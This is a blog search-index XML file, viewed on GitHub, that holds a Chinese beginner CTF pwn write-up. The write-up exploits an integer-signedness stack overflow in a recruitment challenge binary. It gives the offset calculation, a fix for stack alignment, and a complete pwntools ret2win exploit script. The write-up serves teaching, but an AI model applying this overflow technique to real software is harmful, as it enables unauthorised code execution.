-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathlocal-search.xml
More file actions
38 lines (18 loc) · 6.32 KB
/
local-search.xml
File metadata and controls
38 lines (18 loc) · 6.32 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>PWN初体验</title>
<link href="/2024/08/07/PWN%E5%88%9D%E4%BD%93%E9%AA%8C/"/>
<url>/2024/08/07/PWN%E5%88%9D%E4%BD%93%E9%AA%8C/</url>
<content type="html"><![CDATA[<h1 id="初识PWN"><a href="#初识PWN" class="headerlink" title="初识PWN"></a>初识PWN</h1><p>NEUQCSA的招新彩蛋题:《蓝屏王Vincent Flibustier传奇》<a href="pwn">pwn</a></p><h1 id="首先查看保护情况"><a href="#首先查看保护情况" class="headerlink" title="首先查看保护情况"></a>首先查看保护情况</h1><figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">checksec pwn</span><br></code></pre></td></tr></table></figure><p><img src="/2024/08/07/PWN%E5%88%9D%E4%BD%93%E9%AA%8C/checksec_pwn.png" alt="checksec pwn"></p><ol><li>64位小端</li><li>relro等级为partial,约等于没有</li><li>canary未开启</li><li>NX(栈不可执行)开启,但问题不大</li><li>PIE未开启</li></ol><h1 id="使用ida64反编译,观察伪代码"><a href="#使用ida64反编译,观察伪代码" class="headerlink" title="使用ida64反编译,观察伪代码"></a>使用ida64反编译,观察伪代码</h1><h2 id="溢出点"><a href="#溢出点" class="headerlink" title="溢出点"></a>溢出点</h2><p><img src="/2024/08/07/PWN%E5%88%9D%E4%BD%93%E9%AA%8C/%E6%BA%A2%E5%87%BA%E7%82%B9.png" alt="溢出点"></p><ol><li>22行:min函数返回类型的是signed char,当v5 - 8 < 16 时,返回v5 - 8</li><li>23行:memcpy第三个参数的类型是size_t,是unsigned int。如果传入的是一个负数,例如-1,此时memcpy接收到的是一个很大的数,会造成缓冲区溢出</li></ol><h2 id="计算偏移量"><a href="#计算偏移量" class="headerlink" title="计算偏移量"></a>计算偏移量</h2><p>双击dest数组,进入main函数栈<br><img src="/2024/08/07/PWN%E5%88%9D%E4%BD%93%E9%AA%8C/%E8%AE%A1%E7%AE%97%E5%81%8F%E7%A7%BB%E9%87%8F.png" alt="计算偏移量"><br>由于缓冲区是从低地址向高地址写入,因此溢出的数据可以替换main函数的返回地址,也就是图中的r<br>要填充的无关数据的长度是dest和s的总长度,也就是<code>0x20+0x8=0x28</code></p><h2 id="目标函数"><a href="#目标函数" class="headerlink" title="目标函数"></a>目标函数</h2><p><img src="/2024/08/07/PWN%E5%88%9D%E4%BD%93%E9%AA%8C/backdoor.png" alt="backdoor"><br>目标地址为:<code>0x401379</code></p><h1 id="构造payload(pwntools)"><a href="#构造payload(pwntools)" class="headerlink" title="构造payload(pwntools)"></a>构造payload(pwntools)</h1><figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">payload</span> = b<span class="hljs-string">'a'</span> * <span class="hljs-number">0</span>x28 + p64(<span class="hljs-number">0</span>x401379)<br></code></pre></td></tr></table></figure><p><img src="/2024/08/07/PWN%E5%88%9D%E4%BD%93%E9%AA%8C/exp_1.png" alt="exp_1"></p><h2 id="异常"><a href="#异常" class="headerlink" title="异常"></a>异常</h2><p>结束了吗,还没。。。<br>当payload发送过去后,发生了错误,没有shell<br>我们使用gdb调试一下<br><img src="/2024/08/07/PWN%E5%88%9D%E4%BD%93%E9%AA%8C/exp_1_gdb.png" alt="exp_1_gdb"><br><img src="/2024/08/07/PWN%E5%88%9D%E4%BD%93%E9%AA%8C/pwndbg_1.png" alt="pwndbg_1"><br>在pwndbg输入c继续执行,但需要把1填进pwn程序中(好像是bug,得有这一步,bzd为啥没发过去QAQ)<br><img src="/2024/08/07/PWN%E5%88%9D%E4%BD%93%E9%AA%8C/%E5%AF%B9%E9%BD%90.png" alt="对齐"><br>他的意思是<code>0x7fffd9cd9558</code>没有对齐16bytes<br>为什么要对齐16bytes:movaps 要求对齐 16bytes,不然会抛出异常</p><h2 id="对齐"><a href="#对齐" class="headerlink" title="对齐"></a>对齐</h2><p>movaps 这条指令除了操作xmm之外,还操作了rsp。rsp是栈顶指针,如果少了一次入栈或者出栈操作(rsp -8,rsp+8),就能对齐16bytes<br>对于此题,跳过一条入栈操作即可,那么目标地址变成了:<code>0x40137E</code></p><h1 id="真正的exp"><a href="#真正的exp" class="headerlink" title="真正的exp"></a>真正的exp</h1><figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs isbl"><span class="hljs-variable">from</span> <span class="hljs-variable">pwn</span> <span class="hljs-variable">import</span> *<br><br><span class="hljs-variable">backdoor_addr</span> = <span class="hljs-number">0</span><span class="hljs-variable">x40137E</span><br><span class="hljs-variable">offset</span> = <span class="hljs-number">0</span><span class="hljs-variable">x20</span> + <span class="hljs-number">8</span><br><span class="hljs-variable">payload</span> = <span class="hljs-variable">b</span><span class="hljs-string">'a'</span> * <span class="hljs-variable">offset</span> + <span class="hljs-function"><span class="hljs-title">p64</span>(<span class="hljs-variable">backdoor_addr</span>)</span><br><br><span class="hljs-variable">p</span> = <span class="hljs-function"><span class="hljs-title">process</span>(<span class="hljs-string">"./pwn"</span>)</span><br><br><span class="hljs-variable">p.sendline</span>(<span class="hljs-variable">payload</span>)<br><span class="hljs-variable">p.sendline</span>(<span class="hljs-variable">b</span><span class="hljs-string">'1'</span>)<br><br><span class="hljs-variable">p.interactive</span>()<br></code></pre></td></tr></table></figure>]]></content>
<categories>
<category>CTF</category>
<category>PWN</category>
</categories>
<tags>
<tag>NEUQCSA</tag>
<tag>CTF</tag>
<tag>PWN</tag>
</tags>
</entry>
</search>